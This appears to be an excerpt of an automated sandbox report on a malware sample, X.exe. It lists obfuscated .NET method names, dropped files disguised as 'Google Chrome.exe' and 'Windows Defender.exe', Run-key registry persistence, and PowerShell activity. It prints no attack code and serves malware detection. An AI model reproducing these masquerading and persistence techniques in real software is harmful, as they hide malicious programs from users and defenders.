                        Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.cs | High entropy of concatenated method names: 'DAd6MY6WE4amuhxrr4rf7HcKOjmPHzihO08yso7tjrHGipjdfQJGte2kNfYt1A', 'EEG2usG8WiBmb3SmuxCcnsQ3osy3y3GDWYkPji0Al1v1JWS0sQRz09IittLfuX', 'QcKEpexPmpox3XOwz4Bl7riUjiPtDwWUxZWYZQtYskm3cKI0ruZMF5g8k670ow', 'WZ7ktBjfrsh68udUUPkZrVhR4WMHREcWaGCfr20GIw65JCQmUgxeG5HrXJmZkf', 'eORZ7fjqhZzG3pzpIn4alL1aoCtIhWEKGQF2JVYzoSGJgi5OzYLKqqSJ1HmMG7', '_553psPh1t5SncNT6ckbKASBJC8uq3fDBHTJIabfU3j1zKoozq4Ci7UzzSCmJtI', 'SyFv2P5XoehdJnT219CeBvc978z1Ho9JrjfROxl1zcFauUtGBjZQ1P8EaFitC0', 'HJO9Xmz1UIQBlQ0JBoV3uUz1irYdtjXjyH0WW2hMdPtDQWgMpG6xP3YF0EoIsD', 'mWcZIDE7MfG3T6MrBrPQiHWeMnLjdXzRv8PqZkTfI3o1E85R1ZFEtHbb8QiUL4', 'hXogqRoM3BqP35AogVfb4qDe4JHRqCjxysRympSYAy0C5Saj7YkhHXjHU0FZYg'
                        Source: Windows Defender.exe.0.dr, WqBFPPAGdP3qekKnUXbSbMnJQkYEWq6EDn6c9pYZqk7IrAascLDqgnmAgB4ND2.cs | High entropy of concatenated method names: '_2YF2CRCsDxdnPdsPBchoEhwDZKc2AXV8hIOv01TvH6OQlY4T1VOIp7Tkpf2sST', 'izfsM6M5EJ9022yy2GhiMa4Bwnc097KT7AhqxNHBKX7zq8jK6gCmwgw3KdQKda', 'Ux2rE57wFUIxDfwqfnBFCGFSB0GjwBtVP29hwIjLDU1S9quzDBNA22Lay2S0JK', '_43Lx3rAdBh2j4nWOx656HHtCbrZ1PdRnus0reiTUGQoGpicRD8iPa9pXSiZJOc', 'Z13RptwCW6XMeTAkZkkKdm9kNxgi9iKJlLM8IF79bjsu2BhrUZT1siGtlJ4BwO', '_6Q2P9IWxjqddZPGIaZe7mUWnyZmJKvHhjKz91sMVMlcYij9rq4vXtUogf7WrHl', 'X68ePNrQwDbQ8uqQNDHJSitBmeJXe2Q49tAB0TGy72VGUASLGdoz4QZzKHzrgS', '_4VLeHC1i6LkyVH2oQRjg5pHqg89lv7hXZdrnn3ceAR7VmVTgNPZTSsprslXefR', 'nm0e3gZXlCPxo4CZhSxRNAuslaHN5n2q5GASCv78CCyarQHpdJprQ9neptRq0e', 'Vmyuxdcefk6376V9aadd6WNzN74pa5hWPfAoVWk8dTKIrHIFiZGcxW4mxtNlkc'
                        Source: Windows Defender.exe.0.dr, PhdSKSjN5lWl2CjyeILdY5jzMVuS5YkIGYuKXV2ib8uKrmCC1o0oLoxqW8QtPsNXXPV4wrpR9iXmR.cs | High entropy of concatenated method names: 'JoRZgwYRrib0pzhpbwWuCtzXsDVKwaWx5tO0u2n7d2Cz2N5q28xKD8Fwiqx4STiG0XvtWrH2LhOU1', 'btLAU14pks6PBxFwEe0mhymuEFOGtv1mHvL8Z1lwxNp1uuoqscXUIuXCJMntdvB7QJ4SrgXOqP2Ac', 'ugnFlO8xTqB6vzX4WBwVisSRqh5O5nGNDs3hF8G8QzWX8KfWJpJ6ZFoFuLNjzXlAL7ehRPDMozBR1', 'b7N61fbBnHn379Cg8KG40J7wXB15pCeuevw12h2z463IzZDO9oFoHQcxWRzgKeg6Sj8hhRpGhSOaK', 'KElHQzROcJDUxi5j7UiI8pcLCBOq32DagRpElG4rBN4kpdWNsJamX8yMLUkIqoTrKuS2oYHzR29fo', 'zJENyi6rDFsfvR2PuqsNpRvB0DB3RMi6deOtdOSMdhaBI7Iwv18yYOQSgB3RrlSmWhJHq0PDGfQem', 'enY8qBECWHWHiOg0sJlf5zeZ6a6HQ7dtubz2ewvOScb8ZuTBjUEMAMVrwY29V6ThmbdmOlKDjip5V', 'ndjhIoTbd7FTL4aAH7NOjBb6yoQNNVPtuVkyYeqawMbmsbxyqaY7WBC8lEQ8sWtPZROnieYwkS8CT', '_7qlab1dNPzWfuJE6nU9nYteKoAIV5Hl3bR2emlAtQmjm4Q33fpzxH7Vob9GFwcoBiQsdKh7FcPx7r', 'om2e3sWjhmFSXj6ueB3p2lrHh3loqJI3Ln3FYvLU8zxsAizAWP1FAwqU5fQLtWJ1Fp4gz7atHLzFy'
                        Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.cs | High entropy of concatenated method names: '_36Iu8s60bxeFR4yMJVHnKU3HH5G0XdCkYGRvNxeusm2xRkTCirth7MIl3bEYMLRwcgVbXbYXWzRJj', 'faomJDQTH9JfrQdsdIlJKfaYbhf3qszNtTnzmUj4976tVVM5Y09H9aNvYFx3TnCXKgLYGVS0lMNLU', 'rkDeZ2n9YEpjTXkJxDoMHTqWF5YQd0ylDMfuTpp5s3RqbkwPhJeNuKgSA415fXhpW68YBHy6Ymcge', 'bHYmEjJ7sdLajo2keOL4u3oa4NrZ9hWJZht8YVkxC2ecvLJErDhtjiRJpCyxpalQXR3elrvDqcgLe', 'ln6UL6yiXM4T1Pr6d3btbvrjL9SoiNilXgU9dDYgetX8ow3FRkWwlwOEaLaToOsql87Je9Y4zZPkt', 'dqW1HlDiGOIQY2sX2VquBfHHMmw6Iu3xtqqcvf3AoUZDJwuOrWVbqgy1qwESKzJ2lJZ3aU0tw6J6C', 'no09akK38j3bIvQNA4Wdv7ufwBUbJ93yyNZghYNkS4ACJlXfxQjAzpXfgczhJ5ArkYZ6gwbvXjSNB', 'EBzFOEVL98ZjzRwTm8lKAdFIiSXYqMGmzGaBjdj0VkZIpSt5tG7a3tBb7LUAIMT7ainpEqxxZMwJ0', '_6EjaJhzY4Gaveg0ui8NYtJg97g738DxWHUEsjKOSVPIJNkk7ze8aJ00bLYqNIMYIkiaqs2WYsOwPU', '_5bUJBXaOgvlMv64mzSubcFb8PqbAGAT8inlazolutMv5ocpXlyla3VzKWXSfp1pZCpEzynoqnlhjb'
                        Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.cs | High entropy of concatenated method names: 'WwjisSxxDCIbYcd4Y4UsqmXSlLzy6oLoIqOCTMWAInrkF', 'bBheXXcZoHVHxH3bBwr4aiknrJ30F2bql9MOkfWOgWaTq', 'Zdz9Y1bCXi8V72fSYkM8d7sniuRdX542x8pAEt3CeMF9j', 'yXMXIg1VptpW8byLQs5HSkP1TA0h1hAEQiHbQSes2bmcp', 'I2YmHmS08pAbFmzOSBH8Y9cTmI9CWatYj4soluOsJsGYz', 'LVuZSiiDv5SFtOV7OLqTzSGpKYqkYtH4XZd8ll22xBt6P', 'D6tgcK1HEP2IGjUVuhog1CaWcVSXFyYs8oDUuBWgoKCPK', '_32gxo0e19sbzb3vOpQ77zPrQGLg0R87ydpGd041Mfbvm8', 'WZylfD2CEeMMaIvgBNUQv7gc2RbHrrLbHNWRRmPYb6aSw', 'lZyYSscCiEU4lOIVItSVV7ZuAnLoEt96sL8470xdo95Jf'
                        Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.cs | High entropy of concatenated method names: 'uAIdma4NR8QqGZMhHTp2pkwIUASRT1s5TCCMoALNGGqZUcAQgjPmEfsnMYfpcU', 'E8guj0wkTXSDi5PFQB7VFk', '_2BlW37vOQ5lBjwqupApYeu', 'O3m6VbhYCCdK6SVfSdZECU', '_46xAuc1Pk0nvKAyw2iwSns'
                        Source: Google Chrome.exe.0.dr, jrpcTEvwrHLqRyJr.cs | High entropy of concatenated method names: 'n6zY7SAVCFHSUas0', '_5u90BQKmyRZ1eHyk', '_4ayTVWlBE9zPll85', 'v0TUPDCgCertO9ISBLj6Ks5ySm6sXd2gqmjV6C0QA1xeZnAk', 'XX9gKT0BQjmjplVu8C2b36iW2oCp1Ec9r24dBqV8rtgoH1Gc', 'c1fcVHBM1Z2NZ5nEZm97YsCRoSI1Yl0RuoWo7bAjjpTMkOce', 'pVbnbXkSrLua0mWOAd5y9PZASCo6xbf6QYuvIe30J98rhPB5', 'sfJ1PnqihDg0YYH5j6cBfhvGOaM1DyRCLQZ7sJZvEgApEXy0', '_7sJXJem4fx1wNk8WdJJCtSnCTD7u5DRm6zGvVXzLoh8LyuhF', 'VJlh2FAsAuXJq9USNTjYzUlFGlrmJLLxkbMTl6SgVoJWVZDn'
                        Source: Google Chrome.exe.0.dr, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | High entropy of concatenated method names: 'NRNaQiL45HdvDE12rlpjtHiVgewI5IY', 'oayXCFlyxRcNG8Jh2Pkem7iiL5yjIc6', '_8BbbEBAIVhrTrngXfKYzb0vuRgPJ8I9', 'gOOq3tqQTNIc3fpOeAIJvqFdGQC1N9n', 'i2Ku7FUOqzNLdb87n6XtsO8BCKeCGef', 'rTNybMCNvpLU1mzBmG8SUeZg3muzZgK', 'AtWHzfMZG1pMlUty0vIk3qVlWsuIQva', '_0SJ9Qp1ltJir7yTsoFhX5NkSSJhHOqH', '_1D1W9pj644gjadQUV2xD2YcS1Na9oU0', '_3TPmxJhS9o1EWhxsomNZ3B8jWNcoZ5G'
                        Source: Google Chrome.exe.0.dr, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | High entropy of concatenated method names: '_8RdgBs8hsKc1Xchvn2E27CgOkhSFoyV', 'f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7', '_3jnBuRACGTClEVxVYkJcOgKRMf2592k', 'vylxe4g5k8nkkpbiZ6y9Scim0TIMlFk', 'QBsxGonALOQAUKA40rzlOyGY8fA6U1L', 'aVIrdjG2tf77GFHFxxrwjfZxRz5lCsm', 'uy0K927WZFwasL8hGin2hAyR9cQhS7X', 'g7BCflj5inLC0crvdd0pYUG7vWl38py', 'TnL1QraWSY95QDURwJ1lmSgxHwqLtSl', 'ogiNgCdZm7pmO643ea2GYmasMz19ncO'
                        Source: Google Chrome.exe.0.dr, w7ZIRjsvip4MF5xGsbBND80ojJ4dh5g.cs | High entropy of concatenated method names: 'Nx3F4Pq2rRNYc17giIIqq6grtK5HPJk', 'egW94Lk6guFqcb6HsOVrS1htfU7FJWB', 'h96VMbfQPnTKAdEPxf6pZMcTkXLJs6F', '_2lP6glD6EWETGQ5TMMMZC7OikS6mWmq', 'IV1Y2etqJljurSX3', 'houvz32a6Zl2mEXe', 'nSiO4tePrjSotMCz', '_6tvowFv9nogysn4q', 'ptmHhgcMISltGkT0', 'wrdSv0ILtECCEtJw'
                        Source: Google Chrome.exe.0.dr, 95IUXxLlqJejB12ZmlfVehHxTvY7hK7.cs | High entropy of concatenated method names: 'zO97l4bWsDYwEuC13Dh97PM8zPZVp2v', 'Dncea824rrtH3UkejCOtVMU4U9EZ6py', 'gm2byZWLfUE2kN5qzvM2v9bxYezko9d', 's19zmkrFCyjLRvvVKnCHrqb1AbJ2N8b', 'mxrLPLumYLJ8agiCeHFPXLD6Ji0d9J3', 'UhhkkC8ORQA2Byyil5KrSpk3uFLQ5sE', 'c3HVHtQR0OdVZZZptKkxfTMGFT1jrGc', 'L1iOuf0jbeIAVdorxYggkHQfAei9qfA', 'zjozaRMGIZQYLYnN4qTuafvEDtYVlTV', '_5wYe5ENJX5mkytI5AxE8kpKOe6RhNCO'
                        Source: Google Chrome.exe.0.dr, 1I2uDx72OuHy9A5f6b5YLHuDm6qHQgA.cs | High entropy of concatenated method names: 'hOlh9c922Gl5MoIZrC2CmOOfVnNbtlB', 'AgraGoSCMLEfiC0UJZeNawIitt4s2hk', 'MgtORkUENm79TnfisYEyYkUfxyL4jKZ', '_9G1vtUTHvRJYDfKeddJp0RzObOxrUhJ', 'oUorYDfFYsMd9dsRsZ5riV1WPnreL6V', 'lVHGLL8xKlS1OanFMALVDAkh0AFYs90', '_9wgi8v7FCwFLxwWaGzti7rsGMZqxTpO', '_9xG1VuffErxxW83pWzFHDrXS7D2fgOF', 'MjK2VGXEkI3oS4FZjPlPH7rBlKzZFSd', 'ys5YHLn03jNcqndQKYYWOunHKBcRCc0'
                        Source: Google Chrome.exe.0.dr, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.cs | High entropy of concatenated method names: 'ZY9ToOBPVEn15PRC6rbgQuqq9VXVVBE', 'va4uJ0eKytu4E2I8ZuaNh3pz2g8l8mQ', 'Spwr39kyR3vbMuWeh5EzqsQIkNICorr', 'QnD41hgm5idFCYVehTMR35VCWeWc6Wf', 'nyD2eb9EKCEb7XgB9l6QXFf6kwDo4kS', 'LTa90cdtGsRM5kIeC9iN55dXZdw8KKL', 'kiQ43LuThWeojuzbQ0ZsJTfuz2ifoMf', 'EG7GkGmbX7KDDZStQAWeI3g3zBXKfyj', 'NAgkei94MYNFuWUCVNX6t6kKhN4HACp', 'j9ev6vQA6vSMcrgBdjVDhZlT7B9BF30'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, jrpcTEvwrHLqRyJr.cs | High entropy of concatenated method names: 'n6zY7SAVCFHSUas0', '_5u90BQKmyRZ1eHyk', '_4ayTVWlBE9zPll85', 'v0TUPDCgCertO9ISBLj6Ks5ySm6sXd2gqmjV6C0QA1xeZnAk', 'XX9gKT0BQjmjplVu8C2b36iW2oCp1Ec9r24dBqV8rtgoH1Gc', 'c1fcVHBM1Z2NZ5nEZm97YsCRoSI1Yl0RuoWo7bAjjpTMkOce', 'pVbnbXkSrLua0mWOAd5y9PZASCo6xbf6QYuvIe30J98rhPB5', 'sfJ1PnqihDg0YYH5j6cBfhvGOaM1DyRCLQZ7sJZvEgApEXy0', '_7sJXJem4fx1wNk8WdJJCtSnCTD7u5DRm6zGvVXzLoh8LyuhF', 'VJlh2FAsAuXJq9USNTjYzUlFGlrmJLLxkbMTl6SgVoJWVZDn'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, nLxyvU4XZkGViCTKiVdfH88oRZM5Cuv.cs | High entropy of concatenated method names: 'NRNaQiL45HdvDE12rlpjtHiVgewI5IY', 'oayXCFlyxRcNG8Jh2Pkem7iiL5yjIc6', '_8BbbEBAIVhrTrngXfKYzb0vuRgPJ8I9', 'gOOq3tqQTNIc3fpOeAIJvqFdGQC1N9n', 'i2Ku7FUOqzNLdb87n6XtsO8BCKeCGef', 'rTNybMCNvpLU1mzBmG8SUeZg3muzZgK', 'AtWHzfMZG1pMlUty0vIk3qVlWsuIQva', '_0SJ9Qp1ltJir7yTsoFhX5NkSSJhHOqH', '_1D1W9pj644gjadQUV2xD2YcS1Na9oU0', '_3TPmxJhS9o1EWhxsomNZ3B8jWNcoZ5G'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, lMJ17HZDOGp8KoWHaP9qO9cbZmbpZU5.cs | High entropy of concatenated method names: '_8RdgBs8hsKc1Xchvn2E27CgOkhSFoyV', 'f9ZdtOKP4Q3DUGf2u4fXoYuntvta6B7', '_3jnBuRACGTClEVxVYkJcOgKRMf2592k', 'vylxe4g5k8nkkpbiZ6y9Scim0TIMlFk', 'QBsxGonALOQAUKA40rzlOyGY8fA6U1L', 'aVIrdjG2tf77GFHFxxrwjfZxRz5lCsm', 'uy0K927WZFwasL8hGin2hAyR9cQhS7X', 'g7BCflj5inLC0crvdd0pYUG7vWl38py', 'TnL1QraWSY95QDURwJ1lmSgxHwqLtSl', 'ogiNgCdZm7pmO643ea2GYmasMz19ncO'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, w7ZIRjsvip4MF5xGsbBND80ojJ4dh5g.csHigh entropy of concatenated method names: 'Nx3F4Pq2rRNYc17giIIqq6grtK5HPJk', 'egW94Lk6guFqcb6HsOVrS1htfU7FJWB', 'h96VMbfQPnTKAdEPxf6pZMcTkXLJs6F', '_2lP6glD6EWETGQ5TMMMZC7OikS6mWmq', 'IV1Y2etqJljurSX3', 'houvz32a6Zl2mEXe', 'nSiO4tePrjSotMCz', '_6tvowFv9nogysn4q', 'ptmHhgcMISltGkT0', 'wrdSv0ILtECCEtJw'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 95IUXxLlqJejB12ZmlfVehHxTvY7hK7.csHigh entropy of concatenated method names: 'zO97l4bWsDYwEuC13Dh97PM8zPZVp2v', 'Dncea824rrtH3UkejCOtVMU4U9EZ6py', 'gm2byZWLfUE2kN5qzvM2v9bxYezko9d', 's19zmkrFCyjLRvvVKnCHrqb1AbJ2N8b', 'mxrLPLumYLJ8agiCeHFPXLD6Ji0d9J3', 'UhhkkC8ORQA2Byyil5KrSpk3uFLQ5sE', 'c3HVHtQR0OdVZZZptKkxfTMGFT1jrGc', 'L1iOuf0jbeIAVdorxYggkHQfAei9qfA', 'zjozaRMGIZQYLYnN4qTuafvEDtYVlTV', '_5wYe5ENJX5mkytI5AxE8kpKOe6RhNCO'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 1I2uDx72OuHy9A5f6b5YLHuDm6qHQgA.csHigh entropy of concatenated method names: 'hOlh9c922Gl5MoIZrC2CmOOfVnNbtlB', 'AgraGoSCMLEfiC0UJZeNawIitt4s2hk', 'MgtORkUENm79TnfisYEyYkUfxyL4jKZ', '_9G1vtUTHvRJYDfKeddJp0RzObOxrUhJ', 'oUorYDfFYsMd9dsRsZ5riV1WPnreL6V', 'lVHGLL8xKlS1OanFMALVDAkh0AFYs90', '_9wgi8v7FCwFLxwWaGzti7rsGMZqxTpO', '_9xG1VuffErxxW83pWzFHDrXS7D2fgOF', 'MjK2VGXEkI3oS4FZjPlPH7rBlKzZFSd', 'ys5YHLn03jNcqndQKYYWOunHKBcRCc0'
                        Source: 0.2.X.exe.140f9ac0.0.raw.unpack, 2Sm6sbKCwAKYAjIbNupRyoKBubRBSDp.csHigh entropy of concatenated method names: 'ZY9ToOBPVEn15PRC6rbgQuqq9VXVVBE', 'va4uJ0eKytu4E2I8ZuaNh3pz2g8l8mQ', 'Spwr39kyR3vbMuWeh5EzqsQIkNICorr', 'QnD41hgm5idFCYVehTMR35VCWeWc6Wf', 'nyD2eb9EKCEb7XgB9l6QXFf6kwDo4kS', 'LTa90cdtGsRM5kIeC9iN55dXZdw8KKL', 'kiQ43LuThWeojuzbQ0ZsJTfuz2ifoMf', 'EG7GkGmbX7KDDZStQAWeI3g3zBXKfyj', 'NAgkei94MYNFuWUCVNX6t6kKhN4HACp', 'j9ev6vQA6vSMcrgBdjVDhZlT7B9BF30'
                        Source: C:\Users\user\Desktop\X.exe | File created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                        Source: C:\Users\user\Desktop\X.exe | File created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe

                        Boot Survival

                        Source: C:\Users\user\Desktop\X.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
                        Source: C:\Users\user\Desktop\X.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Chrome

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
